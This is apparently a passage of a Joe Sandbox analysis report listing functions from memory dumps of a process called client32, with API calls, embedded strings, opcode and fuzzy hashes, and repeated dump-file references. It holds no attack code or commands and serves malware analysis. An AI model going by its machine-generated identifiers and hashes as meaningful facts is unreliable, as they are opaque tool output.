                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                        • API String ID: 803148776-2671469338
                                                                                                                                        • Opcode ID: 33004280def899aedbdd59ab7d35921a2397866726736b24204f4e0db693ef8a
                                                                                                                                        • Instruction ID: 525b041ee30ef258a90152d0e3e6e0367babb19e0c8a23f39ea24a783e9997a7
                                                                                                                                        • Opcode Fuzzy Hash: 33004280def899aedbdd59ab7d35921a2397866726736b24204f4e0db693ef8a
                                                                                                                                        • Instruction Fuzzy Hash: 13E01234A1D30C9ED701A774C14576876E9AB4821CFD541E1D5ACC7321D724E994CA42
                                                                                                                                        Function 6891653F Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 6891654B
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __amsg_exit.LIBCMT ref: 6891656B
                                                                                                                                        • __lock.LIBCMT ref: 6891657B
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 68916598
                                                                                                                                        • _free.LIBCMT ref: 689165AB
                                                                                                                                        • InterlockedIncrement.KERNEL32(025E16E0), ref: 689165C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3470314060-0
                                                                                                                                        • Opcode ID: f831b580ebc39c233dcca409e6664be4bfbd7dd213376687ce5fbcb7a0df0653
                                                                                                                                        • Instruction ID: af4c321a48ec55bc43dd2d9ce42ca7b7600fccb6cf8b945d3cf636a0f4f776e8
                                                                                                                                        • Opcode Fuzzy Hash: f831b580ebc39c233dcca409e6664be4bfbd7dd213376687ce5fbcb7a0df0653
                                                                                                                                        • Instruction Fuzzy Hash: EA018C36D4CA29EBDF32AB64804476E77B4AF45729FC04109E9A0B7288CB74E940CBD5
                                                                                                                                        Function 68917A14 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 68917A20
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __calloc_crt.LIBCMT ref: 68917A2B
                                                                                                                                          • Part of subcall function 6891D3F5: Sleep.KERNEL32(00000000,68916F16,00000001,00000214), ref: 6891D41D
                                                                                                                                        • __lock.LIBCMT ref: 68917A61
                                                                                                                                        • ___addlocaleref.LIBCMT ref: 68917A6D
                                                                                                                                        • __lock.LIBCMT ref: 68917A81
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 68917A91
                                                                                                                                          • Part of subcall function 689160F9: __getptd_noexit.LIBCMT ref: 689160F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3803058747-0
                                                                                                                                        • Opcode ID: 83a0eb22deb545aedb46a157252cb4c464d3c2f446b600b5e9becdf550dacf28
                                                                                                                                        • Instruction ID: 4cf49d0a82f24c4623fc80250b1dbdc2d202aac3aeb32b6073784cc1c03398c0
                                                                                                                                        • Opcode Fuzzy Hash: 83a0eb22deb545aedb46a157252cb4c464d3c2f446b600b5e9becdf550dacf28
                                                                                                                                        • Instruction Fuzzy Hash: 60018C39A0D709EAE721ABB8D84172C77A0AF14728FA08109E6D4962C0CF74CA40CB51
                                                                                                                                        Function 688F68D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 131COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,68903061,?), ref: 688F69EB
                                                                                                                                        • _free.LIBCMT ref: 688F6A07
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F6A1B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_free
                                                                                                                                        • String ID: FAILED_REASON$LICENSE
                                                                                                                                        • API String ID: 2208350527-1913596546
                                                                                                                                        • Opcode ID: ec9369177ca04f4a4b2d61651f9e38aa8d5f2f714071e4825dc37caf45c4ddb1
                                                                                                                                        • Instruction ID: 90cb7f6b398a82484eccf3d85f7ba2702b594be7e91020751625ba130407240a
                                                                                                                                        • Opcode Fuzzy Hash: ec9369177ca04f4a4b2d61651f9e38aa8d5f2f714071e4825dc37caf45c4ddb1
                                                                                                                                        • Instruction Fuzzy Hash: 55414A31A08517ABDB11CE7889546AB7BF5DF92384F844678DD95D7700EB31DD0AC390
                                                                                                                                        Function 688F2E50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID: %s: $HTCTL32
                                                                                                                                        • API String ID: 4139908857-3797952780
                                                                                                                                        • Opcode ID: fde1d7ca758acafc7c8f0d80ff1f6c0e72e51543034d1239b11c5b74dbf0d670
                                                                                                                                        • Instruction ID: 49a410dbe16e88c5e2cfc3b4c034823c24d8ef47794323407bbb7faafe25cb74
                                                                                                                                        • Opcode Fuzzy Hash: fde1d7ca758acafc7c8f0d80ff1f6c0e72e51543034d1239b11c5b74dbf0d670
                                                                                                                                        • Instruction Fuzzy Hash: 204119305085599BCF30DF68DC18BEE77B4EF4A345F508AA5E82997540DB349A4ACF90
                                                                                                                                        Function 110331B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strncpy$wsprintf
                                                                                                                                        • String ID: %s (%s)
                                                                                                                                        • API String ID: 2895084632-1363028141
                                                                                                                                        • Opcode ID: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
                                                                                                                                        • Instruction ID: 6d4a293539ff99ff9d91cd4089b7baa119477a06ea1ce5901e9509b66a7a6bff
                                                                                                                                        • Opcode Fuzzy Hash: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
                                                                                                                                        • Instruction Fuzzy Hash: 4731F374E143469FEB11CF24DCC4BA7BBE8AF85309F004968E9458B382E7B4E514CBA1
                                                                                                                                        Function 688FF470 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FF48A
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 68911975
                                                                                                                                          • Part of subcall function 68911960: __CxxThrowException@8.LIBCMT ref: 6891198A
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 6891199B
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FF4C7
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 688FF528
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 1615890066-4289949731
                                                                                                                                        • Opcode ID: e7a8ce24667a7638cfc5116136a85bf849c67a573772d84428feef4458f01728
                                                                                                                                        • Instruction ID: c7c69ded4413a9d604fa6ce60d66bbfc3e92efa5fc120e7c5b526a6ef5598b68
                                                                                                                                        • Opcode Fuzzy Hash: e7a8ce24667a7638cfc5116136a85bf849c67a573772d84428feef4458f01728
                                                                                                                                        • Instruction Fuzzy Hash: D431D9337042149BD3208E5CE840A5EF3A9EBB56A4F600E3FF551DB650DBA1D842C3A1
                                                                                                                                        Function 110EB160 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,76944C70), ref: 110EB1B1
                                                                                                                                        • _free.LIBCMT ref: 110EB1CC
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
                                                                                                                                        • _free.LIBCMT ref: 110EB293
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue_free$ErrorFreeHeapLast
                                                                                                                                        • String ID: Error %d getting %s
                                                                                                                                        • API String ID: 3888477750-2709163689
                                                                                                                                        • Opcode ID: 99a52e7cc423a9fb728a5c7937be03a162a1ca7ac1d80426d03d15f8f4c4acb2
                                                                                                                                        • Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
                                                                                                                                        • Opcode Fuzzy Hash: 99a52e7cc423a9fb728a5c7937be03a162a1ca7ac1d80426d03d15f8f4c4acb2
                                                                                                                                        • Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1
                                                                                                                                        Function 1106D168 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                        • wsprintfA.USER32 ref: 1106D299
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF
                                                                                                                                          • Part of subcall function 11139BB0: std::_Xinvalid_argument.LIBCPMT ref: 11139BCA
                                                                                                                                          • Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,A0A8B03E,?,?,?,?,?,?), ref: 1110C8D4
                                                                                                                                          • Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterEventXinvalid_argumentstd::_wsprintf
                                                                                                                                        • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                                                        • API String ID: 1787781242-2624497655
                                                                                                                                        • Opcode ID: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
                                                                                                                                        • Instruction ID: 04573714079795333ec223b70536839c78a5a0195139b0015b045f9e3d8978cb
                                                                                                                                        • Opcode Fuzzy Hash: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
                                                                                                                                        • Instruction Fuzzy Hash: CD318975E00296EFDB25CF50C880F9EB3B8AB45318F0085DAE54A6B241DB70EAC5CB61
                                                                                                                                        Function 6890FAD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,27CEFB69), ref: 6890FB04
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 6890FB3E
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 6890FB69
                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 6890FBA4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
                                                                                                                                        • String ID: list<T> too long
                                                                                                                                        • API String ID: 930337060-4027344264
                                                                                                                                        • Opcode ID: 26959fe81b62d98f5b3110d8d632878b4b024524be641f92d759ad3f66264f5b
                                                                                                                                        • Instruction ID: dc4b591f3e8d7e0cf65289ad8a9e0e7a8f8a09a963586c21ed1485cc3e329be0
                                                                                                                                        • Opcode Fuzzy Hash: 26959fe81b62d98f5b3110d8d632878b4b024524be641f92d759ad3f66264f5b
                                                                                                                                        • Instruction Fuzzy Hash: 45314D75608704AFDB24CF68C894A6ABBF8FB89318F50861DE85ED7684D770E900CB64
                                                                                                                                        Function 1106D197 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,A0A8B03E,?,?,?,?,?,?), ref: 1110C8D4
                                                                                                                                          • Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                        • wsprintfA.USER32 ref: 1106D299
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
